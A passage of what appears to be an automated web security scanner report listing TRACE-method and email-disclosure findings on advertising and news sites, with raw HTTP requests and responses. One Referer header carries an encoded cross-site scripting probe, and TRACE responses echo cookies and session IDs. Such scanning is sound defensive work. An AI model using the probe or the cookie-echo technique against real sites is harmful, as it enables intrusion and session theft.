Date: Sat, 17 Sep 2011 16:23:02 GMT
Server: Apache/2.2.3 (Red Hat)
Content-Type: message/http
Accept-Ranges: bytes
Cache-Control: public
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
x-cdn: Cotendo
Connection: close

TRACE / HTTP/1.1
Host: www.chron.com
Cookie: ea1e0ff83f43374
Accept-Encoding: gzip
X-Forwarded-For: 50.23.123.106
x-chpd-loop: 1
Via: 1.0 PXY003-SANJ.COTENDO.NET (chpd/4.01.0008.11)
Connection: close

20.53. http://www.crosspixel.net/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.crosspixel.net
Path:   /

Request

TRACE / HTTP/1.0
Host: www.crosspixel.net
Cookie: 1550cebb9a77f34

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:43:45 GMT
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.crosspixel.net
Cookie: 1550cebb9a77f34; OPTOUT=1

20.54. http://www.fetchback.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fetchback.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.fetchback.com
Cookie: 913a162e6cf0bf3b

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 17:32:10 GMT
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.fetchback.com
Cookie: 913a162e6cf0bf3b; opt=1

20.55. http://www.gather.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gather.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.gather.com
Cookie: 4740a996dcadcd4a

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:28:44 GMT
Server: Apache/2.2.15 (Unix) mod_jk/1.2.28
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.gather.com
Cookie: 4740a996dcadcd4a; JSESSIONID=0E4D838206BDB859EE02307D40936463; vis=NHlt+Lk5IZ3dxgr1zkbTl8TLnORF3qkd0LfP/8B7QAiD3p8la3P/7EGo6KG91aOe2Hyf1U+5+OJj+x4v6P757yEro+IXWkIi7xRVJTV8tC3VPlJZjj46fM56l5aedSs7; gathersid=www06; ref
...[SNIP]...
20.56. http://www.localedge.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.localedge.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.localedge.com
Cookie: 6dfc561bb800cae7

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:26:15 GMT
Server: Oracle-Application-Server-10g/10.1.2.0.0 Oracle-HTTP-Server
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Cookie: 6dfc561bb800cae7
Host: www.localedge.com

20.57. http://www.mathtag.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mathtag.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.mathtag.com
Cookie: c88678da020d0117

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:48:23 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.mathtag.com
Cookie: c88678da020d0117; optout=1; uuid=4e394470-3e17-879f-6d77-411115d4b5ad; mt_mop=10008:1315139190|5:1315061038|9:1315272819|2:1315139242|13:1315426476|10002:1313678517|11:1315427469|4:1313678521; ts=1316277341

20.58. http://www.seattlepi.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.seattlepi.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.seattlepi.com
Cookie: 173eb39fb080ed2e

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:23:31 GMT
Server: Apache/2.2.3 (Red Hat)
Content-Type: message/http
Accept-Ranges: bytes
Cache-Control: public
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
x-cdn: Cotendo
Connection: close

TRACE / HTTP/1.1
Host: www.seattlepi.com
Cookie: 173eb39fb080ed2e; btype=web
Accept-Encoding: gzip
X-Forwarded-For: 50.23.123.106
x-chpd-loop: 1
Via: 1.0 PXY008-SANJ.COTENDO.NET (chpd/4.01.0008.8)
Connection: close

20.59. http://www.stamfordadvocate.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.stamfordadvocate.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.stamfordadvocate.com
Cookie: e75940c35f3568fc

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:23:02 GMT
Server: Apache/2.2.3 (Red Hat)
Content-Type: message/http
Accept-Ranges: bytes
Cache-Control: public
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
x-cdn: Cotendo
Connection: close

TRACE / HTTP/1.1
Host: www.stamfordadvocate.com
Cookie: e75940c35f3568fc; btype=web
Accept-Encoding: gzip
X-Forwarded-For: 50.23.123.106
x-chpd-loop: 1
Via: 1.0 PXY008-SANJ.COTENDO.NET (chpd/4.01.0008.8)
Connection: close

20.60. http://www.timesunion.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.timesunion.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.timesunion.com
Cookie: 9c49fdf7f0d12ecc

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:23:17 GMT
Server: Apache/2.2.3 (Red Hat)
Content-Type: message/http
Accept-Ranges: bytes
Cache-Control: public
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
x-cdn: Cotendo
Connection: close

TRACE / HTTP/1.1
Host: www.timesunion.com
Cookie: 9c49fdf7f0d12ecc; btype=web
Accept-Encoding: gzip
X-Forwarded-For: 50.23.123.106
x-chpd-loop: 1
Via: 1.0 PXY012-SANJ.COTENDO.NET (chpd/4.01.0008.8)
Connection: close

20.61. http://www.tribalfusion.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tribalfusion.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.tribalfusion.com
Cookie: f91d5c2f644218db

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:43:34 GMT
Server: Apache/2.2.13 (Unix) PHP/5.3.0
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Cookie: f91d5c2f644218db; ANON_ID=OptOut
X-Cluster-Client-Ip: 50.23.123.106
Connection: Keep-Alive
Host: www.tribalfusion.com

20.62. http://www.ugo.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ugo.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.ugo.com
Cookie: 1ae2525f44243b72

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:28:01 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.ugo.com
Cookie: 1ae2525f44243b72; cgi-session-id=892E3524-E149-11E0-B2DF-D8F552265BD2; optimizelyEndUserId=oeu1316294750531r0.9246824700385332; optimizelyBuckets=%7B%7D; _vaHC=holdout=false; UGOwelcome=welcomeMat:1; __utma=240756231.
...[SNIP]...
21. Email addresses disclosed  previous  next
There are 47 instances of this issue:

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).

21.1. http://ads.adbrite.com/adserver/vdi/762701  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/vdi/762701

Issue detail

The following email address was disclosed in the response:

Request

GET /adserver/vdi/762701?d=439524AE9E11374EB2C0C71740C604 HTTP/1.1
Host: ads.adbrite.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.gather.com/426d8%3Cimg%20src%3da%20onerror%3dalert(1)%3E31b7c6065d67ada9d?recentId=1688849889241963&qualityCommentWidth=350&url=http%3A%2F%2Fwww.gather.com%2F&_=
Cookie: Apache="168296556x0.184+1312290886x-1235322650"; ut="1%3AHczdEkAgEEDhd9nrLsRoGm8TyhC1QjGtd%2Fdze%2BabkyGW0GSw%2Bko%2B9Bs0ELwoIvEkpZmIU8EQ990Tj0bg8Ieg17kmfnq1WiqpOhi66TIv6dAuHwEGrXJOh%2FFfwn0%2F"; rb2=EAE; vsd=0@2@4e737a2c@www.drugstore.com

Response

HTTP/1.1 200 OK
Accept-Ranges: none
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: image/gif
Date: Sat, 17 Sep 2011 17:05:14 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Server: XPEHb/1.0
Set-Cookie: ut=; path=/; domain=.adbrite.com; expires=Sat, 17-Sep-2011 17:05:14 GMT
Set-Cookie: rb2=; path=/; domain=.adbrite.com; expires=Sat, 17-Sep-2011 17:05:14 GMT
Set-Cookie: srh=; path=/; domain=.adbrite.com; expires=Sat, 17-Sep-2011 17:05:14 GMT
Set-Cookie: b="deleted%3A%3Adeleted"; path=/; domain=.adbrite.com; expires=Sun, 16-Sep-2012 17:05:14 GMT
Set-Cookie: vsd=0@3@4e74d34a@www.gather.com; path=/; domain=.adbrite.com; expires=Mon, 19-Sep-2011 17:05:14 GMT
Content-Length: 42

GIF89a.............!.......,........@..D.;
21.2. http://ads.adbrite.com/adserver/vdi/762701  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/vdi/762701

Issue detail

The following email address was disclosed in the response:

Request

GET /adserver/vdi/762701?d=439524AE8C6B634E021F5F7802166020 HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
Referer: http://www.gather.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168296542x0.096+1314892454x-365710891"; untarget=1; b="%3A%3A13beg"; geo="1%3AJY5LDoIwEEDv0q2ftPQ77IwXMEEPgOUTEwEDVQOEuzszbl5eX9tpV%2FFRIl%2FF8niJXIBVUu2ImumY4YBUXJQl19w1dw3khm%2BZQLSSuuPiDNFLZkbd8xzgM8C74MRepAWfvxRX1Gro0KehSc9yrsdjxDXWrsQapEfvv2mm76LG4Y1yK6jW6d%2FGtkc5n1CnR4sqwcfgG7hLaKLX1sVQZSBdU1daW6PFtv0A"; vsd=0@9@4e73f2c9@widget.newsinc.com

Response

HTTP/1.1 200 OK
Accept-Ranges: none
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: image/gif
Date: Sat, 17 Sep 2011 16:33:09 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Server: XPEHb/1.0
Set-Cookie: vsd=0@2@4e74cbc5@www.gather.com; path=/; domain=.adbrite.com; expires=Mon, 19-Sep-2011 16:33:09 GMT
Content-Length: 42

GIF89a.............!.......,........@..D.;
21.3. http://advertising.aol.com/finish/0/4/1/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /finish/0/4/1/

Issue detail

The following email address was disclosed in the response:

Request

GET /finish/0/4/1/ HTTP/1.1
Host: advertising.aol.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=4
Cookie: s_vi=[CS]v1|2722E805851D03EA-400001380002FA31[CE]; s_pers=%20s_getnr%3D1314627287324-Repeat%7C1377699287324%3B%20s_nrgvo%3DRepeat%7C1377699287326%3B; UNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 17:26:07 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Cache-Control: max-age=1209600
Expires: Sat, 01 Oct 2011 17:26:07 GMT
ntCoent-Length: 682
Content-Type: text/html; charset=iso-8859-1
Content-Length: 682

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>200 OK</title>
</head><body>
<h1>OK</h1>
<p>The server encountered an internal error or
misconfiguration and was unable to comple
...[SNIP]...
<p>Please contact the server administrator,
you@example.com and inform them of the time the error occurred,
and anything you might have done that may have
caused the error.</p>
...[SNIP]...
21.4. http://advertising.aol.com/finish/1/4/1/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /finish/1/4/1/

Issue detail

The following email address was disclosed in the response:

Request

GET /finish/1/4/1/ HTTP/1.1
Host: advertising.aol.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=4
Cookie: s_vi=[CS]v1|2722E805851D03EA-400001380002FA31[CE]; s_pers=%20s_getnr%3D1314627287324-Repeat%7C1377699287324%3B%20s_nrgvo%3DRepeat%7C1377699287326%3B; UNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 17:27:17 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Cache-Control: max-age=1209600
Expires: Sat, 01 Oct 2011 17:27:17 GMT
ntCoent-Length: 682
Content-Type: text/html; charset=iso-8859-1
Content-Length: 682

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>200 OK</title>
</head><body>
<h1>OK</h1>
<p>The server encountered an internal error or
misconfiguration and was unable to comple
...[SNIP]...
<p>Please contact the server administrator,
you@example.com and inform them of the time the error occurred,
and anything you might have done that may have
caused the error.</p>
...[SNIP]...
21.5. http://advertising.aol.com/finish/2/4/1/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /finish/2/4/1/

Issue detail

The following email address was disclosed in the response:

Request

GET /finish/2/4/1/ HTTP/1.1
Host: advertising.aol.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=4
Cookie: s_vi=[CS]v1|2722E805851D03EA-400001380002FA31[CE]; s_pers=%20s_getnr%3D1314627287324-Repeat%7C1377699287324%3B%20s_nrgvo%3DRepeat%7C1377699287326%3B; UNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 17:25:37 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Cache-Control: max-age=1209600
Expires: Sat, 01 Oct 2011 17:25:37 GMT
ntCoent-Length: 682
Content-Type: text/html; charset=iso-8859-1
Content-Length: 682

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>200 OK</title>
</head><body>
<h1>OK</h1>
<p>The server encountered an internal error or
misconfiguration and was unable to comple
...[SNIP]...
<p>Please contact the server administrator,
you@example.com and inform them of the time the error occurred,
and anything you might have done that may have
caused the error.</p>
...[SNIP]...
21.6. http://advertising.aol.com/finish/3/4/1/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /finish/3/4/1/

Issue detail

The following email address was disclosed in the response:

Request

GET /finish/3/4/1/ HTTP/1.1
Host: advertising.aol.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=4
Cookie: s_vi=[CS]v1|2722E805851D03EA-400001380002FA31[CE]; s_pers=%20s_getnr%3D1314627287324-Repeat%7C1377699287324%3B%20s_nrgvo%3DRepeat%7C1377699287326%3B; UNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 17:26:47 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Cache-Control: max-age=1209600
Expires: Sat, 01 Oct 2011 17:26:47 GMT
ntCoent-Length: 682
Content-Type: text/html; charset=iso-8859-1
Content-Length: 682

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>200 OK</title>
</head><body>
<h1>OK</h1>
<p>The server encountered an internal error or
misconfiguration and was unable to comple
...[SNIP]...
<p>Please contact the server administrator,
you@example.com and inform them of the time the error occurred,
and anything you might have done that may have
caused the error.</p>
...[SNIP]...
21.7. http://advertising.aol.com/finish/4/4/1/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /finish/4/4/1/

Issue detail

The following email address was disclosed in the response:

Request

GET /finish/4/4/1/ HTTP/1.1
Host: advertising.aol.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=4
Cookie: s_vi=[CS]v1|2722E805851D03EA-400001380002FA31[CE]; s_pers=%20s_getnr%3D1314627287324-Repeat%7C1377699287324%3B%20s_nrgvo%3DRepeat%7C1377699287326%3B; UNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 17:25:55 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Cache-Control: max-age=1209600
Expires: Sat, 01 Oct 2011 17:25:55 GMT
ntCoent-Length: 682
Content-Type: text/html; charset=iso-8859-1
Content-Length: 682

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>200 OK</title>
</head><body>
<h1>OK</h1>
<p>The server encountered an internal error or
misconfiguration and was unable to comple
...[SNIP]...
<p>Please contact the server administrator,
you@example.com and inform them of the time the error occurred,
and anything you might have done that may have
caused the error.</p>
...[SNIP]...
21.8. http://advertising.aol.com/finish/5/4/1/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /finish/5/4/1/

Issue detail

The following email address was disclosed in the response:

Request

GET /finish/5/4/1/ HTTP/1.1
Host: advertising.aol.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=4
Cookie: s_vi=[CS]v1|2722E805851D03EA-400001380002FA31[CE]; s_pers=%20s_getnr%3D1314627287324-Repeat%7C1377699287324%3B%20s_nrgvo%3DRepeat%7C1377699287326%3B; UNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 17:26:10 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Cache-Control: max-age=1209600
Expires: Sat, 01 Oct 2011 17:26:10 GMT
ntCoent-Length: 682
Content-Type: text/html; charset=iso-8859-1
Content-Length: 682

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>200 OK</title>
</head><body>
<h1>OK</h1>
<p>The server encountered an internal error or
misconfiguration and was unable to comple
...[SNIP]...
<p>Please contact the server administrator,
you@example.com and inform them of the time the error occurred,
and anything you might have done that may have
caused the error.</p>
...[SNIP]...
21.9. http://advertising.aol.com/finish/6/4/1/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /finish/6/4/1/

Issue detail

The following email address was disclosed in the response:

Request

GET /finish/6/4/1/ HTTP/1.1
Host: advertising.aol.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=4
Cookie: s_vi=[CS]v1|2722E805851D03EA-400001380002FA31[CE]; s_pers=%20s_getnr%3D1314627287324-Repeat%7C1377699287324%3B%20s_nrgvo%3DRepeat%7C1377699287326%3B; UNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 17:27:02 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Cache-Control: max-age=1209600
Expires: Sat, 01 Oct 2011 17:27:02 GMT
ntCoent-Length: 682
Content-Type: text/html; charset=iso-8859-1
Content-Length: 682

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>200 OK</title>
</head><body>
<h1>OK</h1>
<p>The server encountered an internal error or
misconfiguration and was unable to comple
...[SNIP]...
<p>Please contact the server administrator,
you@example.com and inform them of the time the error occurred,
and anything you might have done that may have
caused the error.</p>
...[SNIP]...
21.10. http://advertising.aol.com/finish/7/4/1/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /finish/7/4/1/

Issue detail

The following email address was disclosed in the response:

Request

GET /finish/7/4/1/ HTTP/1.1
Host: advertising.aol.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=4
Cookie: s_vi=[CS]v1|2722E805851D03EA-400001380002FA31[CE]; s_pers=%20s_getnr%3D1314627287324-Repeat%7C1377699287324%3B%20s_nrgvo%3DRepeat%7C1377699287326%3B; UNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 17:27:12 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Cache-Control: max-age=1209600
Expires: Sat, 01 Oct 2011 17:27:12 GMT
ntCoent-Length: 682
Content-Type: text/html; charset=iso-8859-1
Content-Length: 682

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>200 OK</title>
</head><body>
<h1>OK</h1>
<p>The server encountered an internal error or
misconfiguration and was unable to comple
...[SNIP]...
<p>Please contact the server administrator,
you@example.com and inform them of the time the error occurred,
and anything you might have done that may have
caused the error.</p>
...[SNIP]...
21.11. http://advertising.aol.com/finish/8/4/1/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /finish/8/4/1/

Issue detail

The following email address was disclosed in the response:

Request

GET /finish/8/4/1/ HTTP/1.1
Host: advertising.aol.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=4
Cookie: s_vi=[CS]v1|2722E805851D03EA-400001380002FA31[CE]; s_pers=%20s_getnr%3D1314627287324-Repeat%7C1377699287324%3B%20s_nrgvo%3DRepeat%7C1377699287326%3B; UNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 17:26:57 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Cache-Control: max-age=1209600
Expires: Sat, 01 Oct 2011 17:26:57 GMT
ntCoent-Length: 682
Content-Type: text/html; charset=iso-8859-1
Content-Length: 682

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>200 OK</title>
</head><body>
<h1>OK</h1>
<p>The server encountered an internal error or
misconfiguration and was unable to comple
...[SNIP]...
<p>Please contact the server administrator,
you@example.com and inform them of the time the error occurred,
and anything you might have done that may have
caused the error.</p>
...[SNIP]...
21.12. http://advertising.aol.com/token/0/2/1812733584/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /token/0/2/1812733584/

Issue detail

The following email address was disclosed in the response:

Request

GET /token/0/2/1812733584/ HTTP/1.1
Host: advertising.aol.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
Cookie: s_vi=[CS]v1|2722E805851D03EA-400001380002FA31[CE]; s_pers=%20s_getnr%3D1314627287324-Repeat%7C1377699287324%3B%20s_nrgvo%3DRepeat%7C1377699287326%3B; UNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 17:12:43 GMT
